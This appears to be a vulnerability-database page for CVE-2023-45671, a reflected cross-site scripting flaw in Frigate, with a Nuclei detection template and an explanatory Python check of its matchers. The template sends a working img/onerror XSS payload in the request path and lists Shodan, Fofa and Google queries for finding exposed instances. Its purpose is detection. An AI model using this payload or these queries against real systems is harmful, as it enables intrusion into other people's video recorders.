Frigate < 0.13.0 Beta 3 - Cross-Site Scripting
ID: CVE-2023-45671
Severity: medium
Author: ritikchaddha
Tags: cve,cve2023,frigate,xss
Description
Frigate is an open source network video recorder. Before version 0.13.0 Beta 3, there is a reflected cross-site scripting vulnerability in any API endpoints reliant on the /<camera_name> base path, as values provided for the path are not sanitized. Exploiting this vulnerability requires both that the attacker know very specific information about a user’s Frigate server and that an authenticated user be tricked into clicking a specially crafted link to their Frigate instance. This vulnerability could be exploited by an attacker under the following circumstances: Frigate publicly exposed to the internet (even with authentication); attacker knows the address of a user’s Frigate instance; attacker crafts a specialized page which links to the user’s Frigate instance; attacker finds a way to get an authenticated user to visit their specialized page and click the button/link. As the reflected values included in the URL are not sanitized or escaped, this permits execution of arbitrary JavaScript payloads. Version 0.13.0 Beta 3 contains a patch for this issue.
YAML Source
id: CVE-2023-45671

info:
  name: Frigate < 0.13.0 Beta 3 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    Frigate is an open source network video recorder. Before version 0.13.0 Beta 3, there is a reflected cross-site scripting vulnerability in any API endpoints reliant on the `/<camera_name>` base path as values provided for the path are not sanitized. Exploiting this vulnerability requires the attacker to both know very specific information about a user's Frigate server and requires an authenticated user to be tricked into clicking a specially crafted link to their Frigate instance. This vulnerability could exploited by an attacker under the following circumstances: Frigate publicly exposed to the internet (even with authentication); attacker knows the address of a user's Frigate instance; attacker crafts a specialized page which links to the user's Frigate instance; attacker finds a way to get an authenticated user to visit their specialized page and click the button/link. As the reflected values included in the URL are not sanitized or escaped, this permits execution arbitrary Javascript payloads. Version 0.13.0 Beta 3 contains a patch for this issue.
  remediation: It has been fixed in version 0.13.0 Beta 3
  reference:
    - https://github.com/blakeblackshear/frigate/security/advisories/GHSA-jjxc-m35j-p56f
    - https://nvd.nist.gov/vuln/detail/CVE-2023-45671
    - https://securitylab.github.com/advisories/GHSL-2023-190_Frigate/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.7
    cve-id: CVE-2023-45671
    cwe-id: CWE-79
    epss-score: 0.00924
    epss-percentile: 0.82924
    cpe: cpe:2.3:a:frigate:frigate:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: frigate
    product: frigate
    shodan-query:
      - title:"Frigate"
      - http.title:"frigate"
    fofa-query: title="frigate"
    google-query: intitle:"frigate"
  tags: cve,cve2023,frigate,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/%3Cimg%20src=%22%22%20onerror=alert(document.domain)%3E"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "Camera named <img src=\"\" onerror=alert(document.domain)>")'
          - 'contains(header, "text/html")'
          - 'status_code == 404'
        condition: and
# digest: 4a0a00473045022050ae96f8a7058eebf4ffbeeb7d86e233e9418cecaf44de194144bae644398bfe022100b785627ac3b3af40dafcc94598ce41887bced8081393fb1247862b6a5259295f:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-45671.yaml"
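To show why the template's three matchers fire on an unpatched instance and stop firing once the reflected path value is HTML-escaped, the following added example (not part of the template or of Frigate's code) models the 404 response and evaluates the matchers against it. The handler `not_found_response`, the ` not found` suffix of the body and the exact `Content-Type` header are assumptions made for illustration; escaping is one common mitigation and the page does not say how the patch is implemented.

```python
# Added example: a hypothetical stand-in for the 404 handler, not Frigate's code.
from html import escape
from urllib.parse import unquote

# Request path exactly as it appears in the template's `path` entry.
PROBE_PATH = "/api/%3Cimg%20src=%22%22%20onerror=alert(document.domain)%3E"


def not_found_response(raw_path, sanitize):
    """Hypothetical handler: answer a request for an unknown /api/<camera_name>."""
    camera_name = unquote(raw_path.split("/api/", 1)[1])
    if sanitize:
        # Output-encode the reflected value for the HTML context.
        camera_name = escape(camera_name, quote=True)
    return {
        "status_code": 404,
        "header": "Content-Type: text/html; charset=utf-8",  # constructed
        "body": f"Camera named {camera_name} not found",      # constructed
    }


def template_matches(resp):
    """The template's three DSL matchers, joined by `condition: and`."""
    marker = 'Camera named <img src="" onerror=alert(document.domain)>'
    return (
        marker in resp["body"]
        and "text/html" in resp["header"]
        and resp["status_code"] == 404
    )


def reflects_without_markup(resp):
    """Fix check: the name is still echoed, but no raw tag survives."""
    return "Camera named " in resp["body"] and "<img" not in resp["body"]


if __name__ == "__main__":
    for label, sanitize in (("unescaped", False), ("escaped", True)):
        resp = not_found_response(PROBE_PATH, sanitize)
        print(f"{label}: template matches={template_matches(resp)}")
        print(f"  body: {resp['body']}")
```

The body matcher looks for the literal, unescaped tag, so a response that encodes `<`, `>` and `"` as entities no longer satisfies the template even though it is still a `text/html` 404.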